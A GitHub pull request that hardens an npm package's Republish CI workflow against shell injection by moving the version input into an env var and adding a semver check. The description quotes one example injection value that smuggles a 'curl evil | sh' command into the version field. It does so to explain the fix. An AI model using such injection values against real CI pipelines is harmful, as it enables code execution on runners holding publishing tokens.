### PR TITLE
fix(ci): prevent shell injection from the republish version input

### DIFF
--- a/.github/workflows/republish.yml
+++ b/.github/workflows/republish.yml
@@ -17,8 +17,22 @@ jobs:
       id-token: write
       attestations: write
       contents: read
+    env:
+      # Bind the dispatch input to an env var and reference it as "$VERSION" in
+      # every run step. Interpolating ${{ github.event.inputs.version }} directly
+      # into a shell command lets whoever triggers the workflow inject arbitrary
+      # commands onto the runner (which holds NODE_AUTH_TOKEN); an env var is
+      # passed as data, not spliced into the script text.
+      VERSION: ${{ github.event.inputs.version }}
 
     steps:
+      - name: Validate version input
+        run: |
+          if ! printf '%s' "$VERSION" | grep -Eq '^[0-9]+\.[0-9]+\.[0-9]+(-[0-9A-Za-z.-]+)?$'; then
+            echo "Invalid version '$VERSION': expected a semver like 1.1.3" >&2
+            exit 1
+          fi
+
       - uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1
         with:
           ref: 'v${{ github.event.inputs.version }}'
@@ -36,15 +50,15 @@ jobs:
       # all still require classic token auth, so NODE_AUTH_TOKEN stays here
       # even though the Publish step below no longer needs it.
       - name: Unpublish existing version
-        run: npm unpublish "@egchq/egc@${{ github.event.inputs.version }}" --force || true
+        run: npm unpublish "@egchq/egc@$VERSION" --force || true
         env:
           NODE_AUTH_TOKEN: ${{ secrets.NODE_AUTH_TOKEN }}
 
       - name: Wait for unpublish to propagate
         run: |
           for i in $(seq 1 12); do
-            if ! npm view "@egchq/egc@${{ github.event.inputs.version }}" version >/dev/null 2>&1; then
-              echo "Version ${{ github.event.inputs.version }} no longer visible in registry"
+            if ! npm view "@egchq/egc@$VERSION" version >/dev/null 2>&1; then
+              echo "Version $VERSION no longer visible in registry"
               break
             fi
             echo "Attempt $i: version still visible, waiting 10s..."
@@ -59,7 +73,7 @@ jobs:
 
       - name: Deprecate broken version if still present
         run: |
-          npm deprecate "@egchq/egc@${{ github.event.inputs.version }}" "BROKEN: dashboard/ missing. Republish in progress -- reinstall once fixed." || true
+          npm deprecate "@egchq/egc@$VERSION" "BROKEN: dashboard/ missing. Republish in progress -- reinstall once fixed." || true
 
       - name: Publish
         run: npm publish --access public --provenance --tag latest


### PR DESCRIPTION
## What

The `Republish` workflow (`workflow_dispatch`) interpolated `${{ github.event.inputs.version }}` directly into `npm` shell commands (`unpublish`, `view`, `deprecate`). Whoever triggered the manual dispatch could pass a `version` like `1.0.0"; curl evil | sh; echo "` and run arbitrary commands on the runner, which holds `NODE_AUTH_TOKEN`.

The input is now bound to a `VERSION` env var and referenced as `"$VERSION"` in every run step, so the shell receives it as data rather than splicing it into the script text. A first step validates it as a semver (`1.1.3` / `1.1.3-rc.1`) before anything else runs, which also guards the checkout `ref`.

## Verification

`node scripts/ci/validate-workflow-security.js` passes (22 workflows); YAML parses; `${{ ...version }}` no longer appears in any `run:` step (only the env binding and the checkout ref, which the semver gate covers).

## EGC-441 remainder (follow-up)

Docker hardening (non-root `USER`, `.dockerignore`, multi-stage), the fuzz harness reporting success without exercising `validateCommand`, and the `|| true` masking on release steps are separate, lower-severity items tracked for their own PRs.

<!-- This is an auto-generated description by cubic. -->
---
## Summary by cubic
Hardened the Republish workflow to prevent command injection from the manual `version` input. Protects the runner and `NODE_AUTH_TOKEN`; addresses EGC-441.

- **Bug Fixes**
  - Bind `${{ github.event.inputs.version }}` to `VERSION` and use "$VERSION" in all `npm` commands for `@egchq/egc`.
  - Add an early semver check; fail fast on invalid input and guard the checkout `ref`.
  - Remove direct interpolation from run steps and adjust logs to reference `$VERSION`.

<sup>Written for commit 5d445d22c7d5bdb4df031d25f206201403aa4a38. Summary will update on new commits.</sup>

<a href="https://cubic.dev/pr/Fmarzochi/EGC/pull/1027?utm_source=github" target="_blank" rel="noopener noreferrer" data-no-image-dialog="true"><picture><source media="(prefers-color-scheme: dark)" srcset="https://www.cubic.dev/buttons/review-in-cubic-dark.svg"><source media="(prefers-color-scheme: light)" srcset="https://www.cubic.dev/buttons/review-in-cubic-light.svg"><img alt="Review in cubic" src="https://www.cubic.dev/buttons/review-in-cubic-dark.svg"></picture></a>

<!-- End of auto-generated description by cubic. -->

